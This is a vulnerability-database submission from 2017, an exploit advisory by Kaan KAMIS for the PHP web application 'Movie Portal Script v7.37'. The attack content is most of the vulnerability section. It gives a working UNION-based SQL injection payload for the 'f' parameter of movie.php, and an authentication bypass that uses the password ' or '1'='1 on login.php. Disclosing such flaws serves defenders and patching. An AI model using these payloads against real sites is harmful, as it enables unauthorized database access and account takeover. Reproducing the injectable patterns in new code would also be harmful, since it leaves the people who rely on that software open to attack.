| Title | Movie Portal Script v7.37 – Multiple Vulnerabilities |
|---|
| Description | Introduction
Exploit Title: Movie Portal Script v7.37 – Multiple Vulnerabilities
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Movie Portal Script v7.37 is undoubtedly the finest movie portal.
Vulnerabilities:
------------------------------------------------
SQL Injection
URL : http://localhost/movie-portal-script/movie.php?f=10[payload]
Parameter: f (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 34 columns
Payload: f=-2245 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787a71,0x644b626f666d766b5551474756446f6e596d57784165697044776879524c7264714164476e624e55,0x716a6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MmOv
------------------------------------------------
Authentication Bypass
http://localhost/movie-portal-script/login.php
username : anyusername
password : ' or '1'='1
------------------------------------------------ |
|---|
| User | KAAN KAMIS (UID 213) |
|---|
| Submission | 2017-01-30 13:27 (9 years ago) |
|---|
| Moderation | 2017-01-30 21:56 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 96286 [Movie Portal Script 7.37 movie.php f SQL injection] |
|---|
| Points | 17 |
|---|